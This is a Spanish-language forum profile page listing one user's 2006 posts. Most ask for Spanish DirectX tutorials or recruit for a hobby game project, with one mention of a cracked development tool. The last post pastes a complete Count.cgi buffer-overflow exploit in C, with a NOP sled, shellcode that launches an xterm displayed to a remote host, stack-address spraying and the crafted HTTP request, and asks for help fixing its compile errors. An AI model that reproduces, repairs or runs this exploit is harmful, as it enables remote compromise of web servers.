• Miércoles 24 de Abril de 2024, 10:27

Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.


Mensajes - Isirius

Páginas: 1 [2]
26
DirectX / Re: Directx Manual
« en: Martes 15 de Agosto de 2006, 18:20 »
Es que no se ingles alguien sabe de algun documento en español libro o tutorial por favor gracias.

27
DirectX / Re: Directx Manual
« en: Lunes 14 de Agosto de 2006, 18:00 »
Que compre un libro de DirectX en español mm y donde puedo encontrar uno¿? alguna idea de donde¿?

28
DirectX / Re: Directx Manual
« en: Lunes 14 de Agosto de 2006, 14:43 »
Alguien sabe de alguno asi en español para iniciarse¿?

29
Programación de Videojuegos / Re: Estamos Creando Un Proyecto
« en: Lunes 14 de Agosto de 2006, 14:09 »
Veo que la gente se interesa como dices la experiencia queda hay y eso es lo que cuenta mm bueno si no es pedir mucho todos aquellos que se han interesado por el proyecto podrian agregarme al msn Isirius_@hotmail.com para hablar cuatro cosas bueno enga dew.

paulados la idea es buena le problemae s que no tengo ni idea de por donde se empezaria a hacer eso la verdad bueno ya hablaremos enga suerte.

30
Programación de Videojuegos / Re: Estamos Creando Un Proyecto
« en: Domingo 13 de Agosto de 2006, 12:52 »
Agregame entonces mi msn es Isirius_@hotmail.com por cierto yo tengo 15 años XD jjajaaj beno agregame ya hablamos.

31
Programación de Videojuegos / Estamos Creando Un Proyecto
« en: Viernes 11 de Agosto de 2006, 22:20 »
Bueno estamos intentando reclutar mucha gente diseñadores programadores de C++ aqui entrais vosotros mm bueno este proyecto fue iniciando por Hendrix aqui va la explicacion al que le interese puede dejar su email que seara agregado puede ser divertido y si tiene exito estaria bien tener un propio juego no ¿? Yo tengo algunos atrticulos buenos sobre informacion bueno aqui va la documentacion de Hendrix:

Bueno, navegando enkontre un programa para ahcer juegos en 3D al estilo de Half-Life, Quake, Max Payne, Tomb Raider.....Y me pregunte, haber si entre todos podemos hacer un juego made in CI.....y aki os los propongo. Sera en un compialdor ke kreo ke nadie conocerta, asi ke de esto sabremos igual kasi todos (a no ser ke haya gente ke ya lo use). Aunke si se notara si programan o no en otros lenguajes (komo pasa siempre).

Entornos de Programacion 3D:

Weno, los posibles entornos de programación son:

- Entidad 3D
- Darck Basic (Mejor ke el Entidad creo y por cierto es dificil de konseguir crackeado, asi alguien lo tiene ke lo rule).
- DIV game studio 2 (Dicen que el lenguaje es parecido al C y sus resultados son buenisimos)
- Blitz
- Game Maker
- 3D GameMaker

Editores de Entorno:

Luego apra editores de entorno podriamos usar:

- Photoshop
- 3D Studio Max

Informacion:

Aqui podriamos encontrar informacion bastante buena:

- http://www.flipcode.com/articles/articles_summary.shtml
- http://www.vjuegos.org
- www.gamasutra.com
- www.gamedev.net
- http://www.publispain.com/supertutoriales/...os/1/1div_1.htm

Repartimiento del Grupo:

Basicamente habra estas "categorias".


Director de proyecto.
Programadores.
Guionistas.
Grafistas 2D.
Grafistas 3D.
Modeladores 3D.
Animadores 3D.
Creativos.
Músicos.
Betatesters.



Les va bien ke yo sea Drector del Proyecto?? lo digo puesto ke yo promovere este post, si no les gusta lo dicen...xD xD xD  

Kien se kiera apuntar ke postee y diga en ke seccion kiere estar (musicos no va a ser andie supongo, asi ke nos buskamos una musikilla de internet y ya sta...).

Bueno, si los moderadores/administradores ven ke esto tiene tirada que le pongan chincheta, ya que creo que esto sera interesante pueto que en ningun foro de hacking se a echo un juego suyo...xD xD xD

Otra cosa, el que se quiera apuntar que ponga un tema para hacer el juego, y se votara (en un post aparte) el tema que mas le guste a la gente (tema con una pekeña idea de lo ke se keire hacer).

Empiezo por dar mi idea:

- Yo kiero algo tipo Silent Hill o Resident Evil pero mas real, no se, si tanto monstruo ni nada de eso.

Espero ke colaboren, no me fallen!!!  
 Espero que se apunte muchsiima gente como mas mejor sera el juego y antes estara yo buscare mas gente dew

32
C/C++ / Re: Herrores En Compilacion
« en: Domingo 2 de Julio de 2006, 16:34 »
OK he probado de compilar asi y si va bien pero el problema es que sigue dando los mismos errores alguien me pude ayudar a modificar el codigo para que no me de esos errores gracias.

33
C/C++ / Re: Herrores En Compilacion
« en: Domingo 2 de Julio de 2006, 14:15 »
Sobre lo del kernel quieres decir que no podre compilarlo o que no me servira despues ahora se en que linia esta el error pero alguien puede decirme como modificarlo para que compile es que de C no se mis lenguages son otros de C nos e nada quien puede decirme como arreglarlo¿? Gracias

34
C/C++ / Herrores En Compilacion
« en: Sábado 1 de Julio de 2006, 15:28 »
/*

Count.cgi (wwwcount) linux test exploit
© 05/1997 by plaguez - dube0866@eurobretagne.fr
Contact me if you manage to improve this crap.

This program needs drastic changes to be useable.
If you can't understand how to modify it for your own purpose,
please do not consider trying it.

*/


#include <stdio.h>
#include <stdlib.h>

char shell[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d"
"\x5e\x18\x88\x46\x2c\x88\x46\x30"
"\x88\x46\x39\x88\x46\x4b\x8d\x56"
"\x20\x89\x16\x8d\x56\x2d\x89\x56"
"\x04\x8d\x56\x31\x89\x56\x08\x8d"
"\x56\x3a\x89\x56\x0c\x8d\x56\x10"
"\x89\x46\x10\xb0\x0b\xcd\x80\x31"
"\xdb\x89\xd8\x40\xcd\x80\xe8\xbf"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff"
"/usr/X11R6/bin/xterm0-ut0-display0"
"127.000.000.001:00"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff";


/*

Assembly stuff for the previous buffer.
This basically implements an execve syscall, by creating
an array of char* (needs to put a null byte at the end of
all strings).
Here we gonna exec an xterm and send it to our host.
(you can't simply exec a shell due to the cgi proto).

jmp 60
popl %esi
xorl %eax,%eax # efface eax
movl %esi,%ecx # recupere l'adresse du buffer
leal 0x18(%esi),%ebx # recupere l'adresse des chaines
movb %al,0x2c(%esi) # cree les chaines azt
movb %al,0x30(%esi) #
movb %al,0x39(%esi)
movb %al,0x4b(%esi)
leal 0x20(%esi),%edx # cree le char**
movl %edx,(%esi)
leal 0x2d(%esi),%edx
movl %edx,0x4(%esi)
leal 0x31(%esi),%edx
movl %edx,0x8(%esi)
leal 0x3a(%esi),%edx
movl %edx,0xc(%esi)
leal 0x10(%esi),%edx
movl %eax,0x10(%esi)
movb $0xb,%al
int $0x80 # passe en mode kernel
xorl %ebx,%ebx # termine proprement (exit())
movl %ebx,%eax # si jamais le execve() foire.
inc %eax #
int $0x80 #
call -65 # retourne au popl en empilant l'adresse de la chaine
.byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
.byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
.byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
.ascii \"/usr/X11R6/bin/xterm0\" # 44
.ascii \"-ut0\" # 48
.ascii \"-display0\" # 57 au ;
.ascii \"127.000.000.001:00\" # 75 (total des chaines)
.byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
.byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
...
*/

char qs[7000];
char chaine[]="user=a";

unsigned long getesp() {
// asm("movl %esp,%eax");
return 0xbfffee38;
}

int main(int argc, char **argv) {
int compt;
long stack;

stack=getesp();

if(argc>1)
stack+=atoi(argv[1]);

for(compt=0;compt<4104;compt+=4) {
qs[compt+0] = stack & 0x000000ff;
qs[compt+1] = (stack & 0x0000ff00) >> 8;
qs[compt+2] = (stack & 0x00ff0000) >> 16;
qs[compt+3] = (stack & 0xff000000) >> 24;
}


strcpy(qs,chaine);
qs[strlen(chaine)]=0x90;

qs[4104]= stack&0x000000ff;
qs[4105]=(stack&0x0000ff00)>>8;
qs[4106]=(stack&0x00ff0000)>>16;
qs[4107]=(stack&0xff000000)>>24;
qs[4108]= stack&0x000000ff;
qs[4109]=(stack&0x0000ff00)>>8;
qs[4110]=(stack&0x00ff0000)>>16;
qs[4111]=(stack&0xff000000)>>24;
qs[4112]= stack&0x000000ff;
qs[4113]=(stack&0x0000ff00)>>8;
qs[4114]=(stack&0x00ff0000)>>16;
qs[4115]=(stack&0xff000000)>>24;
qs[4116]= stack&0x000000ff;
qs[4117]=(stack&0x0000ff00)>>8;
qs[4118]=(stack&0x00ff0000)>>16;
qs[4119]=(stack&0xff000000)>>24;
qs[4120]= stack&0x000000ff;
qs[4121]=(stack&0x0000ff00)>>8;
qs[4122]=(stack&0x00ff0000)>>16;
qs[4123]=(stack&0xff000000)>>24;
qs[4124]= stack&0x000000ff;
qs[4125]=(stack&0x0000ff00)>>8;
qs[4126]=(stack&0x00ff0000)>>16;
qs[4127]=(stack&0xff000000)>>24;
qs[4128]= stack&0x000000ff;
qs[4129]=(stack&0x0000ff00)>>8;
qs[4130]=(stack&0x00ff0000)>>16;
qs[4131]=(stack&0xff000000)>>24;

strcpy((char*)&qs[4132],shell);

/* Choose what to do here */
printf("GET /cgi-bin/Count.cgi?%s\n\n",qs);
/*fprintf(stderr,"\n\nadresse: %x0x\n",stack);
printf("GET /cgi-bin/Count.cgi?%s HTTP/1.0\nUser-Agent: %x\n\n",qs,stack);
setenv("QUERY_STRING",qs,1);
system("/usr/local/etc/httpd/cgi-bin/Count.cgi");
system("/bin/sh");*/
liniablanca


bash-3.00# gcc veamos.c
veamos.c: In function `main':
veamos.c:167: error: syntax error at end of input
bash-3.00#

Me gustaria saber como arreglar los errores k me da el compilador gracias.

Páginas: 1 [2]